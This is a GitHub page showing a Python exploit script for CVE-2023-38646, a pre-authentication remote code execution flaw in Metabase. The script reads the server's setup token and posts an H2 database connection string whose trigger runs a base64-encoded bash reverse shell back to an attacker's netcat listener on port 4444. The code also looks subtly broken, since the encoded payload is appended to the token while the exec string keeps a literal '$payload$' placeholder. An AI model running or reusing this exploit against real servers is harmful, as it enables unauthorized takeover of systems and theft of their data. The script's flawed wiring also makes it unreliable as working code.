-
Notifications
You must be signed in to change notification settings - Fork 3
/
CVE-2023-38646.py
64 lines (52 loc) · 2 KB
/
CVE-2023-38646.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
import sys
import json
import base64
import requests
def print_usage():
print("Usage: python metabase_poc.py http://127.0.0.1:3000 listener_ip")
print("Install listener before use: nc -lvnp 4444")
def exploit_metabase(api_url, listener_ip):
listener_port = 4444
payload = f"bash -i >& /dev/tcp/{listener_ip}/{listener_port} 0>&1"
payload_encoded = base64.b64encode(payload.encode()).decode()
url = f"{api_url}/api/session/properties"
response = requests.get(url, verify=False)
curl_data = response.json()
setup_token = curl_data.get("setup-token")
metabase_version = curl_data.get("version", {}).get("tag")
print(f"Payload = {payload}")
print(f"Setup_token = {setup_token}")
print(f"Version = {metabase_version}")
print("\n\t [*] TRY EXPLOIT [*]")
exploit_data = {
"token": f"{setup_token}{payload_encoded}",
"details": {
"is_on_demand": False,
"is_full_sync": False,
"is_sample": False,
"cache_ttl": None,
"refingerprint": False,
"auto_run_queries": True,
"schedules": {},
"details": {
"db": f"zip:/app/metabase.jar!/sample-database.db;MODE=MSSQLServer;TRACE_LEVEL_SYSTEM_OUT=1\\\\;CREATE TRIGGER pwnshell BEFORE SELECT ON INFORMATION_SCHEMA.TABLES AS $$//javascript\\njava.lang.Runtime.getRuntime().exec(\'bash -c {echo,'$payload$'}|{base64,-d}|{bash,-i}\')\\n$$--=x",
"advanced-options": False,
"ssl": True
},
"name": "test",
"engine": "h2"
}
}
exploit_url = f"{api_url}/api/setup/validate"
headers = {"Content-Type": "application/json"}
response = requests.post(exploit_url, json=exploit_data, verify=False)
return response
def main():
if len(sys.argv) < 3:
print_usage()
sys.exit(1)
api_url = sys.argv[1]
listener_ip = sys.argv[2]
response = exploit_metabase(api_url, listener_ip)
if __name__ == "__main__":
main()